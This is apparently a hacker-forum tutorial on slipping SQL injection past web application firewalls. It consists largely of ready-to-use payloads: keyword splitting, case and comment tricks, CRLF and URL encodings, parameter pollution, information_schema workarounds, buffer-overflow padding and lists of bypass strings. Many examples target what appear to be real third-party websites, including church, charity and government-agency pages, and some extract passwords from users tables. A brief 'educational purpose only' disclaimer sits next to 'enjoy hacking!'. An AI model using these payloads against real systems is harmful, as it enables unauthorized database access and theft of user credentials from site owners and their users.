SQL injeCtion : ByPassing WAF (Web Application Firewall)

***this tutorial to show you how to Bypass WAF(Web Application Firewall)***

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+Union+select+1,2,3,4,5,6,7,8,9-- 

like we see [select] is down let's double text [Replacing keywords] like this SeLselectECT

www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9-- 

[5] WAF Bypassing – using characters.

There is a whole bunch of characters available we can use to bypass WAF filters.

following characters can do this:

|, ?, ", ', *, %, £ , [], ;, :, \/, $, €, ()...

by using these characters in lots of cases /*!*/ is not filtered. But the sign * is replaced whit a space and union – select are filtered. which means replacing the keywords would not work.
In these cases we can simply use the * character to split the keywords.

We would do the next logical thing:

www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3,4--+-

Almost the same as splitting keywords.
But in this case only * is filtered out by the was replacing it whit a space having the same result as in splitting keywords.

Advanced WAF Bypassing – Capitalization.

Another way is to simply capitalize our characters.
Instead of union UnIoN In some basic WAF’s this will work.

An example in URL:

www.[site].com/index.php?id=-1+UnIoN+SeLeCt+1,2,3,4--+-

HTTP Parameter Pollution (HPP)

HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name. Since none of the relevant HTTP RFCs define the semantics of HTTP parameter manipulation, each web application delivery platform may deal with it differently. In particular, some environments process such requests by concatenating the values taken from all instances of a parameter name within the request. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.

we see two SQL injection vectors: "Regular attack" and "Attack using HPP". The regular attack demonstrates a standard SQL injection in the prodID parameter. This attack can be easily identified by a security detection mechanism, such as a Web Application Firewall (WAF). The second attack [Figure:2] uses HPP on the prodID parameter. In this case, the attack vector is distributed across multiple occurrences of the prodID parameter. With the correct combination of technology environment and web server, the attack succeeds. In order for a WAF to identify and block the complete attack vector it required to also check the concatenated inputs.

http://testasp.vulnweb.com/showforum.asp?id=-1 union select 1,2 --

testasp.vulnweb.com/showforum.asp?id=-1/* &id= */union/* &id= */select/* &id= */1,2 --

HPP technique

Spoiler (Click to View)

CRLF WAF Bypass technique

CR LF means "Carriage Return, Line Feed"

CR LF means "Carriage Return, Line Feed"-it's a DOS hangover from the olden days from when some devices required a Carriage Return, and some devices required a Line Feed to get a new line, so Microsoft decided to just make a new-line have both characters, so that they would output correctly on all devices.

Windows programs expect their newline format in CRLF (\r\n). *nix expect just LF data (\n). If you open a Unix text document in Notepad on windows, you'll notice that all of the line breaks dissapear and the entire document is on one line. That's because Notepad expects CRLF data, and the Unix document doesn't have the \r character.

There are applications that will convert this for you on a standard *nix distro (dos2unix and unix2dos)

For those wondering, a carriage return and a line feed differ from back in Typewriter days, when a carriage return and a line feed were two different things. One would take you to the beginning of the line (Carriage Return) and a one would move you one row lower, but in the same horizontal location (Line Feed)

CRLF technique

Syntax :

PHP Code:
%0A%0D+Mysql Statement's+%0A%0D

?id=-2+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!+77771,77772,unhex(hex(/*!password*/)),77774+from+/*!`users`*/-- -

Example in URL:

fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 --

Fatal Error Occurred bypassing

to understand how we can bypassing Fatal Error Occurred see this Example :

Example in URL:

http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--

Which it concluded that the error in the structure of one of the columns To avoid this error try changing the word column column value null one by one :-

PHP Code:
http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- No Error

demo :-

http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8--

Bypass with Information_schema.tables

now I will show you many method to Bypass Information_schema.tables

[1] Spaces
information_schema . tables

[2] Backticks

`information_schema`.`tables`

[3] Specific Code

PHP Code:
/*!information_schema.tables*/

[4] Encoded

FROM+information_schema%20%0C%20.%20%09tables

[5] foo with `.`

(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA())

[6] Alternative Names

Alternative Names technique with Example :-

PHP Code:
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints
information_schema.partitions

The [STATISTICS] table provides information about table indexes.

let's see some Example to extract tables and columns

Example -1 [table] : [information_schema.statistics]

fpchurch.org.uk/News/view.php?id=-26+union+select+1,group_concat(table_name),3,4,5+from+information_schema.statistics --

Example -2 [column] : [information_schema.key_column_usage]

http://fpchurch.org.uk/News/view.php?id=-26+union+select+1,column_name,3,4,5+from+information_schema.key_column_usage+whe?re+table_name=0x7573657273 --

Buffer Overflow bypassing

Majority waf Allowav written in the C language, which makes them vulnerable to override.

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

In July 2000, a vulnerability to buffer overflow attack was discovered in Microsoft Outlook and Outlook Express. A programming flaw made it possible for an attacker to compromise the integrity of the target computer by simply it sending an e-mail message. Unlike the typical e-mail virus, users could not protect themselves by not opening attached files; in fact, the user did not even have to open the message to enable the attack. The programs' message header mechanisms had a defect that made it possible for senders to overflow the area with extraneous data, which allowed them to execute whatever type of code they desired on the recipient's computers. Because the process was activated as soon as the recipient downloaded the message from the server, this type of buffer overflow attack was very difficult to defend. Microsoft has since created a patch to eliminate the vulnerability.

Buffer Overflow statement in SQLI

+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)

this AAAAA it's more 1000 A

Example in URL:

PHP Code:
http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799' and 0 union select 1,version(),3,4,5,6,7,8,9--+

with Buffer overflow WAF Bypass Unexpected

http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799'+and(/*!50000select*/ 1)=(/*!32302select*/ 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAA)+ and 0 union select 1,version(),3,4,5,6,7,8,9--+

http://www.petrobangla.org.bd/notice_details.php?nid=594 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!50000union*/ select 1,version(),3,4,5,6,7,8,9--

now let's see some tricks

[1] Union Select bypassing :-

+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+

/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+

+UnIoN/*&a=*/SeLeCT/*&a=*/

+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

[2] concat bypassing

group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29

CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/

concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)

REVERSE(tacnoc)

binary(version())

uncompress(compress(version()))

aes_decrypt(aes_encrypt(version(),1),1)

[3] LIMIT pybassing

If LIMIT not work we can use :-

+LIMIT+0,1

+where+id+=1

WHERE ID_Produit='26 -- -

+having+id+=1

+and length((select password from users having substr(pass,1,1)=’a'))

[4] Null Parameter

id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
=1=1

+And+1=0
/*!and*/+1=0

[5] If Column not Appear

Having+1=1
+and=0+
+div+0+
replace ' = %23
where 1=1
Example in URL:

http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1,2,3,4,5 --

=2=2 Error based

Example in URL:

fpchurch.org.uk/News/view.php?id=26=26+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

+union+select 1111,2222,3333-- see sorce

http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1111,2222,3333,4444,5555 --

[6] unhex(hex code :-

unhex(hex(value))

convert(database() using latin1)

cast(value as char)

uncompress(compress(version()))

cast(value as char)

aes_decrypt(aes_encrypt(value,1),1)

binary(value)

convert()

Example in URL:

http://www.andytimmons.com/video.php?id=-0004 UNION SELECT 1,2,convert(database() using latin1),4,5,6,7,8--

[7] Requested to WAF bypassing :-

# tables #

In tables directly

(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.

enjoy hacking!
Regard : CyberNinja (Owner CN Army)